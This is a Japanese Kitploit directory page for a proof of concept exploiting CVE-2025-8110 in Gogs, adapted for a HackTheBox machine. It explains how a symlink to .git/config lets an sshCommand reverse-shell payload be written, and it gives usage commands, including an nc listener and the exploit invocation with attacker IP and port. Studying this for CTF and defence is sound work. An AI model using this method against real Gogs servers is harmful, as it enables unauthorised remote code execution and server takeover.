Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110は、HTBのSilentiumボックス専用です。 | Kitploit
ツール/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110は、HTBのSilentiumボックス専用です。

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-8110 — Gogs RCE PoC(Silentium / HackTheBox用)

免責事項: このツールは教育目的および許可されたペネトレーションテストにのみ使用することを目的としています。明示的な許可を得たシステムに対してのみ使用してください。


これは zAbuQasem/gogs-CVE-2025-8110 の修正版で、HackTheBox の Silentium マシンに適合するように変更されています。元の PoC は Silentium の特定の Gogs 設定と認証フローに対応するために調整が必要でした。


脆弱性の詳細

CVE-2025-8110 は、セルフホスト型 Git サービス Gogs におけるリモートコード実行の脆弱性です。

Gogs のファイル更新 API エンドポイント(PUT /api/v1/repos/.../contents/<file>)は、対象ファイルがシンボリックリンクかどうかを検証しません。認証済みの攻撃者はリポジトリに .git/config を指すシンボリックリンクをプッシュし、API を使用して悪意のあるペイロードで上書きできます。ペイロードは git 設定にカスタム sshCommand を注入し、Gogs がそのリポジトリで次に SSH 操作を実行する際にサーバー側で実行され、リモートコード実行に至ります。


PoC の動作

  1. Gogs に認証し、ログインページから CSRF トークンを取得します。
  2. ユーザー設定ページから Gogs API トークンを生成します。
  3. API 経由で SSH を有効にした新しいリポジトリを作成します。
  4. リポジトリをローカルにクローンし、シンボリックリンク(malicious_link -> .git/config)を仕込んでプッシュします。
  • シンボリックリンクに対してファイル更新 API を呼び出し、sshCommand = <リバースシェル> を含む悪意のある .git/config を書き込みます。
  • Gogs はシンボリックリンクを辿り、自身の .git/config を上書きし、次の SSH 操作でシェルを起動します。

  • 使用方法

    依存関係のインストール:

    root@kitploit:~
    pip install -r requirements.txt
    

    リスナーを起動:

    root@kitploit:~
    nc -lvnp <PORT>
    

    エクスプロイトを実行:

    root@kitploit:~
    python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
    

    オプション — Burp Suite 経由でルーティング:

    root@kitploit:~
    python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
    
    フラグ説明
    -uGogs のベース URL
    -lh攻撃者の IP(リバースシェルホスト)
    -lpリスナーポート
    -un登録済みの Gogs ユーザー名
    -pwGogs パスワード
    -x(オプション)Burp(localhost:8080)経由でトラフィックをルーティング
    ツールをダウンロード